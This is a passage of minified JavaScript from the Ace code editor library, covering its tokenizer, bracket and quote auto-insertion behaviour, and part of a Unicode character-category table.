n=this.states[t],r=[],i=0,s=this.matchMappings[t]={defaultToken:"text"},o="g",u=[];for(var a=0;a1?f.onMatch=this.$applyToken:f.onMatch=f.token),c>1&&(/\\\d/.test(f.regex)?l=f.regex.replace(/\\([0-9]+)/g,function(e,t){return"\\"+(parseInt(t,10)+i+1)}):(c=1,l=this.removeCapturingGroups(f.regex)),!f.splitRegex&&typeof f.token!="string"&&u.push(f)),s[i]=a,i+=c,r.push(l),f.onMatch||(f.onMatch=null)}r.length||(s[0]=0,r.push("$")),u.forEach(function(e){e.splitRegex=this.createSplitterRegexp(e.regex,o)},this),this.regExps[t]=new RegExp("("+r.join(")|(")+")|($)",o)}};(function(){this.$setMaxTokenCount=function(e){i=e|0},this.$applyToken=function(e){var t=this.splitRegex.exec(e).slice(1),n=this.token.apply(this,t);if(typeof n=="string")return[{type:n,value:e}];var r=[];for(var i=0,s=n.length;il){var g=e.substring(l,m-v.length);h.type==p?h.value+=g:(h.type&&f.push(h),h={type:p,value:g})}for(var y=0;yi){c>2*e.length&&this.reportError("infinite loop with in ace tokenizer",{startState:t,line:e});while(l1&&n[0]!==r&&n.unshift("#tmp",r),{tokens:f,state:n.length?n:r}},this.reportError=r.reportError}).call(s.prototype),t.Tokenizer=s}),ace.define("ace/mode/text_highlight_rules",["require","exports","module","ace/lib/lang"],function(e,t,n){"use strict";var r=e("../lib/lang"),i=function(){this.$rules={start:[{token:"empty_line",regex:"^$"},{defaultToken:"text"}]}};(function(){this.addRules=function(e,t){if(!t){for(var n in e)this.$rules[n]=e[n];return}for(var n in e){var r=e[n];for(var i=0;i=this.$rowTokens.length){this.$row+=1,e||(e=this.$session.getLength());if(this.$row>=e)return this.$row=e-1,null;this.$rowTokens=this.$session.getTokens(this.$row),this.$tokenIndex=0}return this.$rowTokens[this.$tokenIndex]},this.getCurrentToken=function(){return this.$rowTokens[this.$tokenIndex]},this.getCurrentTokenRow=function(){return this.$row},this.getCurrentTokenColumn=function(){var e=this.$rowTokens,t=this.$tokenIndex,n=e[t].start;if(n!==undefined)return n;n=0;while(t>0)t-=1,n+=e[t].value.length;return n},this.getCurrentTokenPosition=function(){return{row:this.$row,column:this.getCurrentTokenColumn()}}}).call(r.prototype),t.TokenIterator=r}),ace.define("ace/mode/behaviour/cstyle",["require","exports","module","ace/lib/oop","ace/mode/behaviour","ace/token_iterator","ace/lib/lang"],function(e,t,n){"use strict";var r=e("../../lib/oop"),i=e("../behaviour").Behaviour,s=e("../../token_iterator").TokenIterator,o=e("../../lib/lang"),u=["text","paren.rparen","punctuation.operator"],a=["text","paren.rparen","punctuation.operator","comment"],f,l={},c=function(e){var t=-1;e.multiSelect&&(t=e.selection.index,l.rangeCount!=e.multiSelect.rangeCount&&(l={rangeCount:e.multiSelect.rangeCount}));if(l[t])return f=l[t];f=l[t]={autoInsertedBrackets:0,autoInsertedRow:-1,autoInsertedLineEnd:"",maybeInsertedBrackets:0,maybeInsertedRow:-1,maybeInsertedLineStart:"",maybeInsertedLineEnd:""}},h=function(e,t,n,r){var i=e.end.row-e.start.row;return{text:n+t+r,selection:[0,e.start.column+1,i,e.end.column+(i?0:1)]}},p=function(){this.add("braces","insertion",function(e,t,n,r,i){var s=n.getCursorPosition(),u=r.doc.getLine(s.row);if(i=="{"){c(n);var a=n.getSelectionRange(),l=r.doc.getTextRange(a);if(l!==""&&l!=="{"&&n.getWrapBehavioursEnabled())return h(a,l,"{","}");if(p.isSaneInsertion(n,r))return/[\]\}\)]/.test(u[s.column])||n.inMultiSelectMode?(p.recordAutoInsert(n,r,"}"),{text:"{}",selection:[1,1]}):(p.recordMaybeInsert(n,r,"{"),{text:"{",selection:[1,1]})}else if(i=="}"){c(n);var d=u.substring(s.column,s.column+1);if(d=="}"){var v=r.$findOpeningBracket("}",{column:s.column+1,row:s.row});if(v!==null&&p.isAutoInsertedClosing(s,u,i))return p.popAutoInsertedClosing(),{text:"",selection:[1,1]}}}else{if(i=="\n"||i=="\r\n"){c(n);var m="";p.isMaybeInsertedClosing(s,u)&&(m=o.stringRepeat("}",f.maybeInsertedBrackets),p.clearMaybeInsertedClosing());var d=u.substring(s.column,s.column+1);if(d==="}"){var g=r.findMatchingBracket({row:s.row,column:s.column+1},"}");if(!g)return null;var y=this.$getIndent(r.getLine(g.row))}else{if(!m){p.clearMaybeInsertedClosing();return}var y=this.$getIndent(u)}var b=y+r.getTabString();return{text:"\n"+b+"\n"+y+m,selection:[1,b.length,1,b.length]}}p.clearMaybeInsertedClosing()}}),this.add("braces","deletion",function(e,t,n,r,i){var s=r.doc.getTextRange(i);if(!i.isMultiLine()&&s=="{"){c(n);var o=r.doc.getLine(i.start.row),u=o.substring(i.end.column,i.end.column+1);if(u=="}")return i.end.column++,i;f.maybeInsertedBrackets--}}),this.add("parens","insertion",function(e,t,n,r,i){if(i=="("){c(n);var s=n.getSelectionRange(),o=r.doc.getTextRange(s);if(o!==""&&n.getWrapBehavioursEnabled())return h(s,o,"(",")");if(p.isSaneInsertion(n,r))return p.recordAutoInsert(n,r,")"),{text:"()",selection:[1,1]}}else if(i==")"){c(n);var u=n.getCursorPosition(),a=r.doc.getLine(u.row),f=a.substring(u.column,u.column+1);if(f==")"){var l=r.$findOpeningBracket(")",{column:u.column+1,row:u.row});if(l!==null&&p.isAutoInsertedClosing(u,a,i))return p.popAutoInsertedClosing(),{text:"",selection:[1,1]}}}}),this.add("parens","deletion",function(e,t,n,r,i){var s=r.doc.getTextRange(i);if(!i.isMultiLine()&&s=="("){c(n);var o=r.doc.getLine(i.start.row),u=o.substring(i.start.column+1,i.start.column+2);if(u==")")return i.end.column++,i}}),this.add("brackets","insertion",function(e,t,n,r,i){if(i=="["){c(n);var s=n.getSelectionRange(),o=r.doc.getTextRange(s);if(o!==""&&n.getWrapBehavioursEnabled())return h(s,o,"[","]");if(p.isSaneInsertion(n,r))return p.recordAutoInsert(n,r,"]"),{text:"[]",selection:[1,1]}}else if(i=="]"){c(n);var u=n.getCursorPosition(),a=r.doc.getLine(u.row),f=a.substring(u.column,u.column+1);if(f=="]"){var l=r.$findOpeningBracket("]",{column:u.column+1,row:u.row});if(l!==null&&p.isAutoInsertedClosing(u,a,i))return p.popAutoInsertedClosing(),{text:"",selection:[1,1]}}}}),this.add("brackets","deletion",function(e,t,n,r,i){var s=r.doc.getTextRange(i);if(!i.isMultiLine()&&s=="["){c(n);var o=r.doc.getLine(i.start.row),u=o.substring(i.start.column+1,i.start.column+2);if(u=="]")return i.end.column++,i}}),this.add("string_dquotes","insertion",function(e,t,n,r,i){if(i=='"'||i=="'"){if(this.lineCommentStart&&this.lineCommentStart.indexOf(i)!=-1)return;c(n);var s=i,o=n.getSelectionRange(),u=r.doc.getTextRange(o);if(u!==""&&u!=="'"&&u!='"'&&n.getWrapBehavioursEnabled())return h(o,u,s,s);if(!u){var a=n.getCursorPosition(),f=r.doc.getLine(a.row),l=f.substring(a.column-1,a.column),p=f.substring(a.column,a.column+1),d=r.getTokenAt(a.row,a.column),v=r.getTokenAt(a.row,a.column+1);if(l=="\\"&&d&&/escape/.test(d.type))return null;var m=d&&/string|escape/.test(d.type),g=!v||/string|escape/.test(v.type),y;if(p==s)y=m!==g,y&&/string\.end/.test(v.type)&&(y=!1);else{if(m&&!g)return null;if(m&&g)return null;var b=r.$mode.tokenRe;b.lastIndex=0;var w=b.test(l);b.lastIndex=0;var E=b.test(l);if(w||E)return null;if(p&&!/[\s;,.})\]\\]/.test(p))return null;y=!0}return{text:y?s+s:"",selection:[1,1]}}}}),this.add("string_dquotes","deletion",function(e,t,n,r,i){var s=r.doc.getTextRange(i);if(!i.isMultiLine()&&(s=='"'||s=="'")){c(n);var o=r.doc.getLine(i.start.row),u=o.substring(i.start.column+1,i.start.column+2);if(u==s)return i.end.column++,i}})};p.isSaneInsertion=function(e,t){var n=e.getCursorPosition(),r=new s(t,n.row,n.column);if(!this.$matchTokenType(r.getCurrentToken()||"text",u)){var i=new s(t,n.row,n.column+1);if(!this.$matchTokenType(i.getCurrentToken()||"text",u))return!1}return r.stepForward(),r.getCurrentTokenRow()!==n.row||this.$matchTokenType(r.getCurrentToken()||"text",a)},p.$matchTokenType=function(e,t){return t.indexOf(e.type||e)>-1},p.recordAutoInsert=function(e,t,n){var r=e.getCursorPosition(),i=t.doc.getLine(r.row);this.isAutoInsertedClosing(r,i,f.autoInsertedLineEnd[0])||(f.autoInsertedBrackets=0),f.autoInsertedRow=r.row,f.autoInsertedLineEnd=n+i.substr(r.column),f.autoInsertedBrackets++},p.recordMaybeInsert=function(e,t,n){var r=e.getCursorPosition(),i=t.doc.getLine(r.row);this.isMaybeInsertedClosing(r,i)||(f.maybeInsertedBrackets=0),f.maybeInsertedRow=r.row,f.maybeInsertedLineStart=i.substr(0,r.column)+n,f.maybeInsertedLineEnd=i.substr(r.column),f.maybeInsertedBrackets++},p.isAutoInsertedClosing=function(e,t,n){return f.autoInsertedBrackets>0&&e.row===f.autoInsertedRow&&n===f.autoInsertedLineEnd[0]&&t.substr(e.column)===f.autoInsertedLineEnd},p.isMaybeInsertedClosing=function(e,t){return f.maybeInsertedBrackets>0&&e.row===f.maybeInsertedRow&&t.substr(e.column)===f.maybeInsertedLineEnd&&t.substr(0,e.column)==f.maybeInsertedLineStart},p.popAutoInsertedClosing=function(){f.autoInsertedLineEnd=f.autoInsertedLineEnd.substr(1),f.autoInsertedBrackets--},p.clearMaybeInsertedClosing=function(){f&&(f.maybeInsertedBrackets=0,f.maybeInsertedRow=-1)},r.inherits(p,i),t.CstyleBehaviour=p}),ace.define("ace/unicode",["require","exports","module"],function(e,t,n){"use strict";function r(e){var n=/\w{4}/g;for(var r in e)t.packages[r]=e[r].replace(n,"\\u$&")}t.packages={},r({L:"0041-005A0061-007A00AA00B500BA00C0-00D600D8-00F600F8-02C102C6-02D102E0-02E402EC02EE0370-037403760377037A-037D03860388-038A038C038E-03A103A3-03F503F7-0481048A-05250531-055605590561-058705D0-05EA05F0-05F20621-064A066E066F0671-06D306D506E506E606EE06EF06FA-06FC06FF07100712-072F074D-07A507B107CA-07EA07F407F507FA0800-0815081A082408280904-0939093D09500958-0961097109720979-097F0985-098C098F09900993-09A809AA-09B009B209B6-09B909BD09CE09DC09DD09DF-09E109F009F10A05-0A0A0A0F0A100A13-0A280A2A-0A300A320A330A350A360A380A390A59-0A5C0A5E0A72-0A740A85-0A8D0A8F-0A910A93-0AA80AAA-0AB00AB20AB30AB5-0AB90ABD0AD00AE00AE10B05-0B0C0B0F0B100B13-0B280B2A-0B300B320B330B35-0B390B3D0B5C0B5D0B5F-0B610B710B830B85-0B8A0B8E-0B900B92-0B950B990B9A0B9C0B9E0B9F0BA30BA40BA8-0BAA0BAE-0BB90BD00C05-0C0C0C0E-0C100C12-0C280C2A-0C330C35-0C390C3D0C580C590C600C610C85-0C8C0C8E-0C900C92-0CA80CAA-0CB30CB5-0CB90CBD0CDE0CE00CE10D05-0D0C0D0E-0D100D12-0D280D2A-0D390D3D0D600D610D7A-0D7F0D85-0D960D9A-0DB10DB3-0DBB0DBD0DC0-0DC60E01-0E300E320E330E40-0E460E810E820E840E870E880E8A0E8D0E94-0E970E99-0E9F0EA1-0EA30EA50EA70EAA0EAB0EAD-0EB00EB20EB30EBD0EC0-0EC40EC60EDC0EDD0F000F40-0F470F49-0F6C0F88-0F8B1000-102A103F1050-1055105A-105D106110651066106E-10701075-1081108E10A0-10C510D0-10FA10FC1100-1248124A-124D1250-12561258125A-125D1260-1288128A-128D1290-12B012B2-12B512B8-12BE12C012C2-12C512C8-12D612D8-13101312-13151318-135A1380-138F13A0-13F41401-166C166F-167F1681-169A16A0-16EA1700-170C170E-17111720-17311740-17511760-176C176E-17701780-17B317D717DC1820-18771880-18A818AA18B0-18F51900-191C1950-196D1970-19741980-19AB19C1-19C71A00-1A161A20-1A541AA71B05-1B331B45-1B4B1B83-1BA01BAE1BAF1C00-1C231C4D-1C4F1C5A-1C7D1CE9-1CEC1CEE-1CF11D00-1DBF1E00-1F151F18-1F1D1F20-1F451F48-1F4D1F50-1F571F591F5B1F5D1F5F-1F7D1F80-1FB41FB6-1FBC1FBE1FC2-1FC41FC6-1FCC1FD0-1FD31FD6-1FDB1FE0-1FEC1FF2-1FF41FF6-1FFC2071207F2090-209421022107210A-211321152119-211D212421262128212A-212D212F-2139213C-213F2145-2149214E218321842C00-2C2E2C30-2C5E2C60-2CE42CEB-2CEE2D00-2D252D30-2D652D6F2D80-2D962DA0-2DA62DA8-2DAE2DB0-2DB62DB8-2DBE2DC0-2DC62DC8-2DCE2DD0-2DD62DD8-2DDE2E2F300530063031-3035303B303C3041-3096309D-309F30A1-30FA30FC-30FF3105-312D3131-318E31A0-31B731F0-31FF3400-4DB54E00-9FCBA000-A48CA4D0-A4FDA500-A60CA610-A61FA62AA62BA640-A65FA662-A66EA67F-A697A6A0-A6E5A717-A71FA722-A788A78BA78CA7FB-A801A803-A805A807-A80AA80C-A822A840-A873A882-A8B3A8F2-A8F7A8FBA90A-A925A930-A946A960-A97CA984-A9B2A9CFAA00-AA28AA40-AA42AA44-AA4BAA60-AA76AA7AAA80-AAAFAAB1AAB5AAB6AAB9-AABDAAC0AAC2AADB-AADDABC0-ABE2AC00-D7A3D7B0-D7C6D7CB-D7FBF900-FA2DFA30-FA6DFA70-FAD9FB00-FB06FB13-FB17FB1DFB1F-FB28FB2A-FB36FB38-FB3CFB3EFB40FB41FB43FB44FB46-FBB1FBD3-FD3DFD50-FD8FFD92-FDC7FDF0-FDFBFE70-FE74FE76-FEFCFF21-FF3AFF41-FF5AFF66-FFBEFFC2-FFC7FFCA-FFCFFFD2-FFD7FFDA-FFDC",Ll:"0061-007A00AA00B500BA00DF-00F600F8-00FF01010103010501070109010B010D010F01110113011501170119011B011D011F01210123012501270129012B012D012F01310133013501370138013A013C013E014001420144014601480149014B014D014F01510153015501570159015B015D015F01610163016501670169016B016D016F0171017301750177017A017C017E-0180018301850188018C018D019201950199-019B019E01A101A301A501A801AA01AB01AD01B001B401B601B901BA01BD-01BF01C601C901CC01CE01D001D201D401D601D801DA01DC01DD01DF01E101E301E501E701E901EB01ED01EF01F001F301F501F901FB01FD01FF02010203020502070209020B020D020F02110213021502170219021B021D021F02210223022502270229022B022D022F02310233-0239023C023F0240024202470249024B024D024F-02930295-02AF037103730377037B-037D039003AC-03CE03D003D103D5-03D703D903DB03DD03DF03E103E303E503E703E903EB03ED03EF-03F303F503F803FB03FC0430-045F04610463046504670469046B046D046F04710473047504770479047B047D047F0481048B048D048F04910493049504970499049B049D049F04A104A304A504A704A904AB04AD04AF04B104B304B504B704B904BB04BD04BF04C204C404C604C804CA04CC04CE04CF04D104D304D504D704D904DB04DD04DF04E104E304E504E704E904EB04ED04EF04F104F304F504F704F904FB04FD04FF05010503050505070509050B050D050F05110513051505170519051B051D051F0521052305250561-05871D00-1D2B1D62-1D771D79-1D9A1E011E031E051E071E091E0B1E0D1E0F1E111E131E151E171E191E1B1E1D1E1F1E211E231E251E271E291E2B1E2D1E2F1E311E331E351E371E391E3B1E3D1E3F1E411E431E451E471E491E4B1E4D1E4F1E511E531E551E571E591E5B1E5D1E5F1E611E631E651E671E691E6B1E6D1E6F1E711E731E751E771E791E7B1E7D1E7F1E811E831E851E871E891E8B1E8D1E8F1E911E931E95-1E9D1E9F1EA11EA31EA51EA71EA91EAB1EAD1EAF1EB11EB31EB51EB71EB91EBB1EBD1EBF1EC11EC31EC51EC71EC91ECB1ECD1ECF1ED11ED31ED51ED71ED91EDB1EDD1EDF1EE11EE31EE51EE71EE91EEB1EED1EEF1EF11EF31EF51EF71EF91EFB1EFD1EFF-1F071F10-1F151F20-1F271F30-1F371F40-1F451F50-1F571F60-1F671F70-1F7D1F80-1F871F90-1F971FA0-1FA71FB0-1FB41FB61FB71FBE1FC2-1FC41FC61FC71FD0-1FD31FD61FD71FE0-1FE71FF2-1FF41FF61FF7210A210E210F2113212F21342139213C213D2146-2149214E21842C30-2C5E2C612C652C662C682C6A2C6C2C712C732C742C76-2C7C2C812C832C852C872C892C8B2C8D2C8F2C912C932C952C972C992C9B2C9D2C9F2CA12CA32CA52CA72CA92CAB2CAD2CAF2CB12CB32CB52CB72CB92CBB2CBD2CBF2CC12CC32CC52CC72CC92CCB2CCD2CCF2CD12CD32CD52CD72CD92CDB2CDD2CDF2CE12CE32CE42CEC2CEE2D00-2D25A641A643A645A647A649A64BA64DA64FA651A653A655A657A659A65BA65DA65FA663A665A667A669A66BA66DA681A683A685A687A689A68BA68DA68FA691A693A695A697A723A725A727A729A72BA72DA72F-A731A733A735A737A739A73BA73DA73FA741A743A745A747A749A74BA74DA74FA751A753A755A757A759A75BA75DA75FA761A763A765A767A769A76BA76DA76FA771-A778A77AA77CA77FA781A783A785A787A78CFB00-FB06FB13-FB17FF41-FF5A",Lu:"0041-005A00C0-00D600D8-00DE01000102010401060108010A010C010E01100112011401160118011A011C011E01200122012401260128012A012C012E01300132013401360139013B013D013F0141014301450147014A014C014E01500152015401560158015A015C015E01600162016401660168016A016C016E017001720174017601780179017B017D018101820184018601870189-018B018E-0191019301940196-0198019C019D019F01A001A201A401A601A701A901AC01AE01AF01B1-01B301B501B701B801BC01C401C701CA01CD01CF01D101D301D501D701D901DB01DE01E001E201E401E601E801EA01EC01EE01F101F401F6-01F801FA01FC01FE02000202020402060208020A020C020E02100212021402160218021A021C021E02200222022402260228022A022C022E02300232023A023B023D023E02410243-02460248024A024C024E03700372037603860388-038A038C038E038F0391-03A103A3-03AB03CF03D2-03D403D803DA03DC03DE03E003E203E403E603E803EA03EC03EE03F403F703F903FA03FD-042F04600462046404660468046A046C046E04700472047404760478047A047C047E0480048A048C048E04900492049404960498049A049C049E04A004A204A404A604A804AA04AC04AE04B004B204B404B604B804BA04BC04BE04C004C104C304C504C704C904CB04CD04D004D204D404D604D804DA04DC04DE04E004E204E404E604E804EA04EC04EE04F004F204F404F604F804FA04FC04FE05000502050405060508050A050C050E05100512051405160518051A051C051E0520052205240531-055610A0-10C51E001E021E041E061E081E0A1E0C1E0E1E101E121E141E161E181E1A1E1C1E1E1E201E221E241E261E281E2A1E2C1E2E1E301E321E341E361E381E3A1E3C1E3E1E401E421E441E461E481E4A1E4C1E4E1E501E521E541E561E581E5A1E5C1E5E1E601E621E641E661E681E6A1E6C1E6E1E701E721E741E761E781E7A1E7C1E7E1E801E821E841E861E881E8A1E8C1E8E1E901E921E941E9E1EA01EA21EA41EA61EA81EAA1EAC1EAE1EB01EB21EB41EB61EB81EBA1EBC1EBE1EC01EC21EC41EC61EC81ECA1ECC1ECE1ED01ED21ED41ED61ED81EDA1EDC1EDE1EE01EE21EE41EE61EE81EEA1EEC1EEE1EF01EF21EF41EF61EF81EFA1EFC1EFE1F08-1F0F1F18-1F1D1F28-1F2F1F38-1F3F1F48-1F4D1F591F5B1F5D1F5F1F68-1F6F1FB8-1FBB1FC8-1FCB1FD8-1FDB1FE8-1FEC1FF8-1FFB21022107210B-210D2110-211221152119-211D212421262128212A-212D2130-2133213E213F214521832C00-2C2E2C602C62-2C642C672C692C6B2C6D-2C702C722C752C7E-2C802C822C842C862C882C8A2C8C2C8E2C902C922C942C962C982C9A2C9C2C9E2CA02CA22CA42CA62CA82CAA2CAC2CAE2CB02CB22CB42CB62CB82CBA2CBC2CBE2CC02CC22CC42CC62CC82CCA2CCC2CCE2CD02CD22CD42CD62CD82CDA2CDC2CDE2CE02CE22CEB2CEDA640A642A644A646A648A64AA64CA64EA650A652A654A656A658A65AA65CA65EA662A664A666A668A66AA66CA680A682A684A686A688A68AA68CA68EA690A692A694A696A722A724A726A728A72AA72CA72EA732A734A736A738A73AA73CA73EA740A742A744A746A748A74AA74CA74EA750A752A754A756A758A75AA75CA75EA760A762A764A766A768A76AA76CA76EA779A77BA77DA77EA780A782A784A786A78BFF21-FF3A",Lt:"01C501C801CB01F21F88-1F8F1F98-1F9F1FA8-1FAF1FBC1FCC1FFC",Lm:"02B0-02C102C6-02D102E0-02E402EC02EE0374037A0559064006E506E607F407F507FA081A0824082809710E460EC610FC17D718431AA71C78-1C7D1D2C-1D611D781D9B-1DBF2071207F2090-20942C7D2D6F2E2F30053031-3035303B309D309E30FC-30FEA015A4F8-A4FDA60CA67FA717-A71FA770A788A9CFAA70AADDFF70FF9EFF9F",Lo:"01BB01C0-01C3029405D0-05EA05F0-05F20621-063F0641-064A066E066F0671-06D306D506EE06EF06FA-06FC06FF07100712-072F074D-07A507B107CA-07EA0800-08150904-0939093D09500958-096109720979-097F0985-098C098F09900993-09A809AA-09B009B209B6-09B909BD09CE09DC09DD09DF-09E109F009F10A05-0A0A0A0F0A100A13-0A280A2A-0A300A320A330A350A360A380A390A59-0A5C0A5E0A72-0A740A85-0A8D0A8F-0A910A93-0AA80AAA-0AB00AB20AB30AB5-0AB90ABD0AD00AE00AE10B05-0B0C0B0F0B100B13-0B280B2A-0B300B320B330B35-0B390B3D0B5C0B5D0B5F-0B610B710B830B85-0B8A0B8E-0B900B92-0B950B990B9A0B9C0B9E0B9F0BA30BA40BA8-0BAA0BAE-0BB90BD00C05-0C0C0C0E-0C100C12-0C280C2A-0C330C35-0C390C3D0C580C590C600C610C85-0C8C0C8E-0C900C92-0CA80CAA-0CB30CB5-0CB90CBD0CDE0CE00CE10D05-0D0C0D0E-0D100D12-0D280D2A-0D390D3D0D600D610D7A-0D7F0D85-0D960D9A-0DB10DB3-0DBB0DBD0DC0-0DC60E01-0E300E320E330E40-0E450E810E820E840E870E880E8A0E8D0E94-0E970E99-0E9F0EA1-0EA30EA50EA70EAA0EAB0EAD-0EB00EB20EB30EBD0EC0-0EC40EDC0EDD0F000F40-0F470F49-0F6C0F88-0F8B1000-102A103F1050-1055105A-105D106110651066106E-10701075-1081108E10D0-10FA1100-1248124A-124D1250-12561258125A-125D1260-1288128A-128D1290-12B012B2-12B512B8-12BE12C012C2-12C512C8-12D612D8-13101312-13151318-135A1380-138F13A0-13F41401-166C166F-167F1681-169A16A0-16EA1700-170C170E-17111720-17311740-17511760-176C176E-17701780-17B317DC1820-18421844-18771880-18A818AA18B0-18F51900-191C1950-196D1970-19741980-19AB19C1-19C71A00-1A161A20-1A541B05-1B331B45-1B4B1B83-1BA01BAE1BAF1C00-1C231C4D-1C4F1C5A-1C771CE9-1CEC1CEE-1CF12135-21382D30-2D652D80-2D962DA0-2DA62DA8-2DAE2DB0-2DB62DB8-2DBE2DC0-2DC62DC8-2DCE2DD0-2DD62DD8-2DDE3006303C3041-3096309F30A1-30FA30FF3105-312D3131-318E31A0-31B731F0-31FF3400-4DB54E00-9FCBA000-A014A016-A48CA4D0-A4F7A500-A60BA610-A61FA62AA62BA66EA6A0-A6E5A7FB-A801A803-A805A807-A80AA80C-A822A840-A873A882-A8B3A8F2-A8F7A8FBA90A-A925A930-A946A960-A97CA984-A9B2AA00-AA28AA40-AA42AA44-AA4BAA60-AA6FAA71-AA76AA7AAA80-AAAFAAB1AAB5AAB6AAB9-AABDAAC0AAC2AADBAADCABC0-ABE2AC00-D7A3D7B0-D7C6D7CB-D7FBF900-FA2DFA30-FA6DFA70-FAD9FB1DFB1F-FB28FB2A-FB36FB38-FB3CFB3EFB40FB41FB43FB44FB46-FBB1FBD3-FD3DFD50-FD8FFD92-FDC7FDF0-FDFBFE70-FE74FE76-FEFCFF66-FF6FFF71-FF9DFFA0-FFBEFFC2-FFC7FFCA-FFCFFFD2-FFD7FFDA-FFDC",M:"0300-036F0483-04890591-05BD05BF05C105C205C405C505C70610-061A064B-065E067006D6-06DC06DE-06E406E706E806EA-06ED07110730-074A07A6-07B007EB-07F30816-0819081B-08230825-08270829-082D0900-0903093C093E-094E0951-0955096209630981-098309BC09BE-09C409C709C809CB-09CD09D709E209E30A01-0A030A3C0A3E-0A420A470A480A4B-0A4D0A510A700A710A750A81-0A830ABC0ABE-0AC50AC7-0AC90ACB-0ACD0AE20AE30B01-0B030B3C0B3E-0B440B470B480B4B-0B4D0B560B570B620B630B820BBE-0BC20BC6-0BC80BCA-0BCD0BD70C01-0C030C3E-0C440C46-0C480C4A-0C4D0C550C560C620C630C820C830CBC0CBE-0CC40CC6-0CC80CCA-0CCD0CD50CD60CE20CE30D020D030D3E-0D440D46-0D480D4A-0D4D0D570D620D630D820D830DCA0DCF-0DD40DD60DD8-0DDF0DF20DF30E310E34-0E3A0E47-0E4E0EB10EB4-0EB90EBB0EBC0EC8-0ECD0F180F190F350F370F390F3E0F3F0F71-0F840F860F870F90-0F970F99-0FBC0FC6102B-103E1056-1059105E-10601062-10641067-106D1071-10741082-108D108F109A-109D135F1712-17141732-1734175217531772177317B6-17D317DD180B-180D18A91920-192B1930-193B19B0-19C019C819C91A17-1A1B1A55-1A5E1A60-1A7C1A7F1B00-1B041B34-1B441B6B-1B731B80-1B821BA1-1BAA1C24-1C371CD0-1CD21CD4-1CE81CED1CF21DC0-1DE61DFD-1DFF20D0-20F02CEF-2CF12DE0-2DFF302A-302F3099309AA66F-A672A67CA67DA6F0A6F1A802A806A80BA823-A827A880A881A8B4-A8C4A8E0-A8F1A926-A92DA947-A953A980-A983A9B3-A9C0AA29-AA36AA43AA4CAA4DAA7BAAB0AAB2-AAB4AAB7AAB8AABEAABFAAC1ABE3-ABEAABECABEDFB1EFE00-FE0FFE20-FE26",Mn:"0300-036F0483-04870591-05BD05BF05C105C205C405C505C70610-061A064B-065E067006D6-06DC06DF-06E406E706E806EA-06ED07110730-074A07A6-07B007EB-07F30816-0819081B-08230825-08270829-082D0900-0902093C0941-0948094D0951-095509620963098109BC09C1-09C409CD09E209E30A010A020A3C0A410A420A470A480A4B-0A4D0A510A700A710A750A810A820ABC0AC1-0AC50AC70AC80ACD0AE20AE30B010B3C0B3F0B41-0B440B4D0B560B620B630B820BC00BCD0C3E-0C400C46-0C480C4A-0C4D0C550C560C620C630CBC0CBF0CC60CCC0CCD0CE20CE30D41-0D440D4D0D620D630DCA0DD2-0DD40DD60E310E34-0E3A0E47-0E4E0EB10EB4-0EB90EBB0EBC0EC8-0ECD0F180F190F350F370F390F71-0F7E0F80-0F840F860F870F90-0F970F99-0FBC0FC6102D-10301032-10371039103A103D103E10581059105E-10601071-1074108210851086108D109D135F1712-17141732-1734175217531772177317B7-17BD17C617C9-17D317DD180B-180D18A91920-19221927192819321939-193B1A171A181A561A58-1A5E1A601A621A65-1A6C1A73-1A7C1A7F1B00-1B031B341B36-1B3A1B3C1B421B6B-1B731B801B811BA2-1BA51BA81BA91C2C-1C331C361C371CD0-1CD21CD4-1CE01CE2-1CE81CED1DC0-1DE61DFD-1DFF20D0-20DC20E120E5-20F02CEF-2CF12DE0-2DFF302A-302F3099309AA66FA67CA67DA6F0A6F1A802A806A80BA825A826A8C4A8E0-A8F1A926-A92DA947-A951A980-A982A9B3A9B6-A9B9A9BCAA29-AA2EAA31AA32AA35AA36AA43AA4CAAB0AAB2-AAB4AAB7AAB8AABEAABFAAC1ABE5ABE8ABEDFB1EFE00-FE0FFE20-FE26",Mc:"0903093E-09400949-094C094E0982098309BE-09C009C709C809CB09CC09D70A030A3E-0A400A830ABE-0AC00AC90ACB0ACC0B020B030B3E0B400B470B480B4B0B4C0B570BBE0BBF0BC10BC20BC6-0BC80BCA-0BCC0BD70C01-0C030C41-0C440C820C830CBE0CC0-0CC40CC70CC80CCA0CCB0CD50CD60D020D030D3E-0D400D46-0D480D4A-0D4C0D570D820D830DCF-0DD10DD8-0DDF0DF20DF30F3E0F3F0F7F102B102C10311038103B103C105610571062-10641067-106D108310841087-108C108F109A-109C17B617BE-17C517C717C81923-19261929-192B193019311933-193819B0-19C019C819C91A19-1A1B1A551A571A611A631A641A6D-1A721B041B351B3B1B3D-1B411B431B441B821BA11BA61BA71BAA1C24-1C2B1C341C351CE11CF2A823A824A827A880A881A8B4-A8C3A952A953A983A9B4A9B5A9BAA9BBA9BD-A9C0AA2FAA30AA33AA34AA4DAA7BABE3ABE4ABE6ABE7ABE9ABEAABEC",Me:"0488048906DE20DD-20E020E2-20E4A670-A672",N:"0030-003900B200B300B900BC-00BE0660-066906F0-06F907C0-07C90966-096F09E6-09EF09F4-09F90A66-0A6F0AE6-0AEF0B66-0B6F0BE6-0BF20C66-0C6F0C78-0C7E0CE6-0CEF0D66-0D750E50-0E590ED0-0ED90F20-0F331040-10491090-10991369-137C16EE-16F017E0-17E917F0-17F91810-18191946-194F19D0-19DA1A80-1A891A90-1A991B50-1B591BB0-1BB91C40-1C491C50-1C5920702074-20792080-20892150-21822185-21892460-249B24EA-24FF2776-27932CFD30073021-30293038-303A3192-31953220-32293251-325F3280-328932B1-32BFA620-A629A6E6-A6EFA830-A835A8D0-A8D9A900-A909A9D0-A9D9AA50-AA59ABF0-ABF9FF10-FF19",Nd:"0030-00390660-066906F0-06F907C0-07C90966-096F09E6-09EF0A66-0A6F0AE6-0AEF0B66-0B6F0BE6-0BEF0C66-0C6F0CE6-0CEF0D66-0D6F0E50-0E590ED0-0ED90F20-0F291040-10491090-109917E0-17E91810-18191946-194F19D0-19DA1A80-1A891A90-1A991B50-1B591BB0-1BB91C40-1C491C50-1C59A620-A629A8D0-A8D9A900-A909A9D0-A9D9AA50-AA59ABF0-ABF9FF10-FF19",Nl:"16EE-16F02160-21822185-218830073021-30293038-303AA6E6-A6EF",No:"00B200B300B900BC-00BE09F4-09F90BF0-0BF20C78-0C7E0D70-0D750F2A-0F331369-137C17F0-17F920702074-20792080-20892150-215F21892460-249B24EA-24FF2776-27932CFD3192-31953220-32293251-325F3280-328932B1-32BFA830-A835",P:"0021-00230025-002A002C-002F003A003B003F0040005B-005D005F007B007D00A100AB00B700BB00BF037E0387055A-055F0589058A05BE05C005C305C605F305F40609060A060C060D061B061E061F066A-066D06D40700-070D07F7